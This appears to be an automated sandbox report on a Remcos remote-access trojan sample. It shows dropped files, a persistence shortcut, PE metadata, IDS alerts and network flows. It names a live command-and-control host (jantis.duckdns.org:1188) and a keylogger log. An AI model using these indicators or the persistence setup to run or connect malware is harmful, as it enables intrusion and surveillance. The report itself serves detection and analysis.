Process: C:\Users\user\Desktop\XY2I8rWLkM.exe
File Type: PE32+ executable (DLL) (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 116908
Entropy (8bit): 5.087211878722834
Encrypted: false
SSDEEP: 1536:AxdWID3z1y5XtsBms9bOPu5jDqWte6VNCl7MbiRvRRJHu:AxdB/usBLOP8qWte6VQRRJHu
MD5: 566B326055C3ED8E2028AA1E2C1054D0
SHA1: C25FA6D6369C083526CAFCF45B5F554635AFE218
SHA-256: A692D4305B95E57E2CFC871D53A41A5BFC9E306CB1A86CA1159DB4F469598714
SHA-512: DA4B0B45D47757B69F9ABC1817D3CB3C85DEB08658E55F07B016FBA053EFE541A5791B9B2B380C25B440BBAE6916C5A2245261553CA3C5025D9D55C943F9823C
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 45%
Joe Sandbox View (similar samples):
• Filename: 2020.xls, Detection: malicious
• Filename: Quotation 20241804.exe, Detection: malicious
• Filename: ORDER-CONFIRMATION-DETAILS-000235374564.cmd, Detection: malicious
• Filename: SecuriteInfo.com.Win32.RATX-gen.12024.12837.exe, Detection: malicious
• Filename: RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ, Detection: malicious
• Filename: 20240416-703661.cmd, Detection: malicious
• Filename: SecuriteInfo.com.FileRepMalware.21353.16266.exe, Detection: malicious
• Filename: disktop.pif.exe, Detection: malicious
• Filename: NEW ORDER 04154SHOP N0AWE12893.bat, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.^........& ....."...$................<a.............................0................ ..............................................................`..(...............\........................... ...(................................................... ...0!.......".................. .P`. ........@.......(..............@.p.. .......P.......0..............@.P@. ..(....`.......6..............@.0@. .......p.......:..............@.0@. ..................................p.. ...............<..............@.0@. ...............>..............@.0.. ....X............F..............@.@.. ....h............H..............@.`.. ..\............J..............@.0B/4...................L..............@.PB/19..................P..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....
Process: C:\Users\user\Desktop\XY2I8rWLkM.exe
File Type: MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Ocihlomc.PIF">), ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 100
Entropy (8bit): 5.0203091011883165
Encrypted: false
SSDEEP: 3:HRAbABGQYmTWAX+rSF55i0XMOTGaOsb8V+Kxy:HRYFVmTWDyz3TGaOETKg
MD5: C071CAC205ED06395BF23543B4BEFF28
SHA1: 3574C8837E5D484F4E1D46E4285AF9D71AC67DFA
SHA-256: C47EF6BE72FE3FC27BA2F64DBDB7606654D6F822CB797D5CC10959E3AD7A2B65
SHA-512: 383C0C063F1CDC29A5A82672883A99EEA4A85D6C5EC0EA157D2A044BBEE39EDBEBB7987EC0378CBF31C107F4D9D233782939652BAAF00A4E6E6604474B1DAA75
Malicious: true
Preview (CRLF line breaks restored):
[InternetShortcut]
URL=file:"C:\\Users\\Public\\Libraries\\Ocihlomc.PIF"
IconIndex=40
HotKey=66
Process: C:\Windows\SysWOW64\colorcpl.exe
File Type: JSON data
Category: dropped
Size (bytes): 963
Entropy (8bit): 4.995620093649274
Encrypted: false
SSDEEP: 12:tklzTknd6CsGkMyGWKyGXPVGArwY3+8aIHrGIArpv/mOAaNO+ao9W7iN5zzkw7Rr:qlkdRNuKyGX855vXhNlT3/77Kdxtro
MD5: 334018F02CE31BCBB4864D602B557FE5
SHA1: C6DE43E8D6B5C026C0B0A56A898A3F00B282B881
SHA-256: F70CE925C3923E25A5ADB7089E7EE752E771FBD073888ABFC426138C9094F1B3
SHA-512: 31EF486A2F75226594BC553CBAFA84B645B6ED456F35F363C8EFD6229F4A731981CA1B7736CD4BD739DDCA885F068E96692BB16C7A906314B52220DC63E318BB
Malicious: false
Preview (line breaks restored):
{
 "geoplugin_request":"81.181.57.52",
 "geoplugin_status":200,
 "geoplugin_delay":"1ms",
 "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",
 "geoplugin_city":"Marietta",
 "geoplugin_region":"Georgia",
 "geoplugin_regionCode":"GA",
 "geoplugin_regionName":"Georgia",
 "geoplugin_areaCode":"",
 "geoplugin_dmaCode":"524",
 "geoplugin_countryCode":"US",
 "geoplugin_countryName":"United States",
 "geoplugin_inEU":0,
 "geoplugin_euVATrate":false,
 "geoplugin_continentCode":"NA",
 "geoplugin_continentName":"North America",
 "geoplugin_latitude":"34.0414",
 "geoplugin_longitude":"-84.5053",
 "geoplugin_locationAccuracyRadius":"1000",
 "geoplugin_timezone":"America\/New_York",
 "geoplugin_currencyCode":"USD",
 "geoplugin_currencySymbol":"$",
 "geoplugin_currencySymbol_UTF8":"$",
 "geoplugin_currencyConverter":0
}
Process: C:\Windows\SysWOW64\colorcpl.exe
File Type: ISO-8859 text, with CRLF line terminators
Category: dropped
Size (bytes): 682
Entropy (8bit): 4.620947518135425
Encrypted: false
SSDEEP: 12:caFqFkLmxyRbmkclkL6hnRRJxINJ/Xqd3egsygDYEW3dtlEW3jgGn:7QFtUbmjlpRPOIwg+NW3doW3L
MD5: 6CD6CDA7A98CEB3372296E5602058AE7
SHA1: 8F5B7B31C909F66CB005C3DE2898F280930DE1E5
SHA-256: 1931169ECD83DB9970D0A6CC3EB4A5638C82C27818AD7411FAD681024F9EBCE0
SHA-512: E01DBEBDC96FFBA902CC2AFC4297B7764CDEDA302F1EE23C06B6D831D069790B6DE1F92B074D99D953C2FF8EA5C9368D63A9412D5C967591D104240EA8921490
Malicious: true
Preview (Remcos agent log; CRLF line breaks restored, ASCII-art banner left as extracted):
... ______ ...(_____ \ ... _____) )_____ ____ ____ ___ ___ ...| __ /| ___ | \ / ___) _ \ /___)...| | \ \| ____| | | ( (__| |_| |___ |...|_| |_|_____)_|_|_|\____)___/(___/ .....
Remcos v4.9.4 Pro
BreakingSecurity.net
21:26:54:957 i | Remcos Agent initialized
21:26:54:957 i | Offline Keylogger Started
21:26:54:957 E | Keylogger initialization failure: error 126
21:26:54:973 i | Access Level: Administrator
21:26:55:021 i | Connecting | TLS Off | jantis.duckdns.org:1188
21:26:55:579 i | Connected | TLS Off | jantis.duckdns.org:1188
21:26:56:025 i | KeepAlive | Enabled | Timeout: 60
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.353300273739676
TrID:
• Win32 Executable (generic) a (10002005/4) 99.38%
• InstallShield setup (43055/19) 0.43%
• Windows Screen Saver (13104/52) 0.13%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
File name: XY2I8rWLkM.exe
File size: 2'200'064 bytes
MD5: 29af19382bdeadee6d93b98f354e703d
SHA1: 3d38885812aa0c910025d86e05287600c745f5c8
SHA256: 8a005601e52341e8aff3c95cf30f4ede6b874d2b7e6ffdb9afda9425733fc5d7
SHA512: ac5df65acdb4b3fbe288983eb7498761c64e7e3dd4161d1f74a6b749468c7b5b5209474e91e199625933f439785a730d181c30d2379f791ea5f424fc407649ef
SSDEEP: 49152:3ARQYxxZrm0UZu0LCi2wcc/Z9L7KtQDSxxZrmh7:3Uxu0UQ0LCccaZ9LU7xuh
TLSH: E1A5AEAED264D02AE332463C6747E3D889FD6DE2681CD70739683184CF756A0760BAD7
File Content Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
Icon Hash: 42505c58deaece40
Entrypoint: 0x45c720
Entrypoint Section: .itext
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics: (none)
Time Stamp: 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: (none)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 3693314404800418c83d1170338a8d27
Instructions at entrypoint (0x45c720):
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0045B384h
call 00007F2214AF2CD1h
mov eax, dword ptr [00528524h]
mov eax, dword ptr [eax]
call 00007F2214B40B8Dh
mov ecx, dword ptr [0052853Ch]
mov eax, dword ptr [00528524h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0045B0A8h]
call 00007F2214B40B8Dh
mov eax, dword ptr [00528524h]
mov eax, dword ptr [eax]
call 00007F2214B40C01h
call 00007F2214AF0D2Ch
lea eax, dword ptr [eax+00h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x12d000 | 0x25f8 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x139000 | 0xe9a00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x132000 | 0x6548 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x131000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x12d710 | 0x5e4 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5a574 | 0x5a600 | 39e735eacb3cf73e0579bbbce729b7a0 | False | 0.5238129970608575 | data | 6.5270705282910875 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x5c000 | 0x768 | 0x800 | b37ab156ea01dd5c8dc77b707983554c | False | 0.587890625 | data | 5.935457813191883 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x5d000 | 0xcb6a8 | 0xcb800 | 2f74c4ed85846196eecdf1510d44e772 | False | 0.6572661528716216 | data | 7.28954640161915 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x129000 | 0x3654 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x12d000 | 0x25f8 | 0x2600 | 1a69732718434cef2e3b12e9973032d4 | False | 0.32421875 | data | 5.2035209007067955 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x130000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x131000 | 0x18 | 0x200 | 276e7ea558228bcda2072cb58aa90558 | False | 0.05078125 | data | 0.17014565200323517 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x132000 | 0x6548 | 0x6600 | a59451bd3cafbc67df06335e3023b0ec | False | 0.6524203431372549 | data | 6.682323619483324 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x139000 | 0xe9a00 | 0xe9a00 | fc90df97384003ff0c9299ab17326d9e | False | 0.5432101474719101 | data | 7.043309886796228 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
WAVE | 0x13a20c | 0x1006 | RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 22050 Hz | Chinese | China | 0.45953193564115064
RT_CURSOR | 0x13b214 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x13b348 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x13b47c | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x13b5b0 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x13b6e4 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x13b818 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x13b94c | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x13ba80 | 0xe528 | Device independent bitmap graphic, 320 x 180 x 8, image size 57600 | Chinese | China | 0.6640017728078549
RT_BITMAP | 0x149fa8 | 0x748 | Device independent bitmap graphic, 30 x 25 x 8, image size 800 | Chinese | China | 0.309549356223176
RT_BITMAP | 0x14a6f0 | 0x748 | Device independent bitmap graphic, 30 x 25 x 8, image size 800 | Chinese | China | 0.5364806866952789
RT_BITMAP | 0x14ae38 | 0x748 | Device independent bitmap graphic, 30 x 25 x 8, image size 800 | Chinese | China | 0.5064377682403434
RT_BITMAP | 0x14b580 | 0x1ec48 | Device independent bitmap graphic, 437 x 284 x 8, image size 124960 | Chinese | China | 0.3863549800038088
RT_BITMAP | 0x16a1c8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x16a398 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0x16a57c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x16a74c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
RT_BITMAP | 0x16a91c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0x16aaec | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0x16acbc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0x16ae8c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x16b05c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0x16b22c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x16b3fc | 0x748 | Device independent bitmap graphic, 30 x 25 x 8, image size 800 | Chinese | China | 0.27896995708154504
RT_BITMAP | 0x16bb44 | 0x748 | Device independent bitmap graphic, 30 x 25 x 8, image size 800 | Chinese | China | 0.5439914163090128
RT_BITMAP | 0x16c28c | 0x748 | Device independent bitmap graphic, 30 x 25 x 8, image size 800 | Chinese | China | 0.5311158798283262
RT_BITMAP | 0x16c9d4 | 0x7958 | Device independent bitmap graphic, 300 x 100 x 8, image size 30000 | Chinese | China | 0.0792235385011589
RT_BITMAP | 0x17432c | 0x13028 | Device independent bitmap graphic, 240 x 320 x 8, image size 76800 | Chinese | China | 0.18373060721257578
RT_BITMAP | 0x187354 | 0x748 | Device independent bitmap graphic, 30 x 25 x 8, image size 800 | Chinese | China | 0.23551502145922748
RT_BITMAP | 0x187a9c | 0x748 | Device independent bitmap graphic, 30 x 25 x 8, image size 800 | Chinese | China | 0.39431330472103004
RT_BITMAP | 0x1881e4 | 0x748 | Device independent bitmap graphic, 30 x 25 x 8, image size 800 | Chinese | China | 0.3792918454935622
RT_BITMAP | 0x18892c | 0xc524 | Device independent bitmap graphic, 275 x 179 x 8, image size 49404 | Chinese | China | 0.040599984148371245
RT_BITMAP | 0x194e50 | 0x4b8 | Device independent bitmap graphic, 12 x 12 x 8, image size 144 | Chinese | China | 0.5339403973509934
RT_BITMAP | 0x195308 | 0xc8 | Device independent bitmap graphic, 12 x 12 x 4, image size 96 | Chinese | China | 0.655
RT_BITMAP | 0x1953d0 | 0x4b8 | Device independent bitmap graphic, 12 x 12 x 8, image size 144 | Chinese | China | 0.7003311258278145
RT_BITMAP | 0x195888 | 0x748 | Device independent bitmap graphic, 30 x 25 x 8, image size 800 | Chinese | China | 0.20869098712446352
RT_BITMAP | 0x195fd0 | 0x748 | Device independent bitmap graphic, 30 x 25 x 8, image size 800 | Chinese | China | 0.3374463519313305
RT_BITMAP | 0x196718 | 0x748 | Device independent bitmap graphic, 30 x 25 x 8, image size 800 | Chinese | China | 0.3310085836909871
RT_BITMAP | 0x196e60 | 0xa04 | Device independent bitmap graphic, 60 x 25 x 8, image size 1500 | Chinese | China | 0.4138065522620905
RT_BITMAP | 0x197864 | 0xa04 | Device independent bitmap graphic, 60 x 25 x 8, image size 1500 | Chinese | China | 0.41341653666146644
RT_BITMAP | 0x198268 | 0x748 | Device independent bitmap graphic, 30 x 25 x 8, image size 800 | Chinese | China | 0.2194206008583691
RT_BITMAP | 0x1989b0 | 0x748 | Device independent bitmap graphic, 30 x 25 x 8, image size 800 | Chinese | China | 0.4125536480686695
RT_BITMAP | 0x1990f8 | 0x748 | Device independent bitmap graphic, 30 x 25 x 8, image size 800 | Chinese | China | 0.40396995708154504
RT_BITMAP | 0x199840 | 0xc524 | Device independent bitmap graphic, 275 x 179 x 8, image size 49404 | Chinese | China | 0.24088531346595862
RT_ICON | 0x1a5d64 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | Chinese | China | 0.3024193548387097
RT_ICON | 0x1a604c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Chinese | China | 0.4560810810810811
RT_ICON | 0x1a6174 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m | | | 0.36538461538461536
RT_ICON | 0x1a721c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m | | | 0.24481327800829875
RT_ICON | 0x1a97c4 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m | | | 0.16580406654343807
RT_ICON | 0x1aec4c | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 3779 x 3779 px/m | | | 0.14218045112781955
RT_ICON | 0x1b5434 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m | | | 0.0967851650301668
RT_STRING | 0x1c5c5c | 0x288 | data | | | 0.4783950617283951
RT_STRING | 0x1c5ee4 | 0xc8 | data | | | 0.665
RT_STRING | 0x1c5fac | 0x10c | data | | | 0.6156716417910447
RT_STRING | 0x1c60b8 | 0x2f0 | data | | | 0.4587765957446808
RT_STRING | 0x1c63a8 | 0x3c0 | data | | | 0.3875
RT_STRING | 0x1c6768 | 0x370 | data | | | 0.4022727272727273
RT_STRING | 0x1c6ad8 | 0x3cc | data | | | 0.33539094650205764
RT_STRING | 0x1c6ea4 | 0x214 | data | | | 0.49624060150375937
RT_STRING | 0x1c70b8 | 0xcc | data | | | 0.6274509803921569
RT_STRING | 0x1c7184 | 0x194 | data | | | 0.5643564356435643
RT_STRING | 0x1c7318 | 0x3c4 | data | | | 0.3288381742738589
RT_STRING | 0x1c76dc | 0x338 | data | | | 0.42961165048543687
RT_STRING | 0x1c7a14 | 0x294 | data | | | 0.42424242424242425
RT_RCDATA | 0x1c7ca8 | 0x10 | data | | | 1.5
RT_RCDATA | 0x1c7cb8 | 0x264 | data | | | 0.7581699346405228
RT_RCDATA | 0x1c7f1c | 0x5a632 | GIF image data, version 89a, 400 x 200 | English | United States | 0.9773975895804184
RT_RCDATA | 0x222550 | 0x286 | Delphi compiled form 'THighScoreForm' | | | 0.6300309597523219
RT_GROUP_CURSOR | 0x2227d8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x2227ec | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x222800 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x222814 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x222828 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x22283c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x222850 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x222864 | 0x4c | data | | | 0.8552631578947368
RT_GROUP_ICON | 0x2228b0 | 0x22 | data | Chinese | China | 1.0
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
ntdll | ZwAllocateVirtualMemory
Language of compilation system | Country where language is spoken | Map
Chinese | China |
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/18/24-21:26:56.124863 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 49707 | 1188 | 192.168.2.5 | 103.186.117.171
04/18/24-21:29:11.385348 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 18, 2024 21:26:51.608380079 CEST | 49704 | 443 | 192.168.2.5 | 13.107.139.11
Apr 18, 2024 21:26:51.608421087 CEST | 443 | 49704 | 13.107.139.11 | 192.168.2.5
Apr 18, 2024 21:26:51.608500004 CEST | 49704 | 443 | 192.168.2.5 | 13.107.139.11
Apr 18, 2024 21:26:51.609765053 CEST | 49704 | 443 | 192.168.2.5 | 13.107.139.11
Apr 18, 2024 21:26:51.609816074 CEST | 443 | 49704 | 13.107.139.11 | 192.168.2.5
Apr 18, 2024 21:26:51.609869003 CEST | 49704 | 443 | 192.168.2.5 | 13.107.139.11
Apr 18, 2024 21:26:51.638703108 CEST | 49705 | 443 | 192.168.2.5 | 13.107.139.11
Apr 18, 2024 21:26:51.638747931 CEST | 443 | 49705 | 13.107.139.11 | 192.168.2.5
Apr 18, 2024 21:26:51.638813972 CEST | 49705 | 443 | 192.168.2.5 | 13.107.139.11
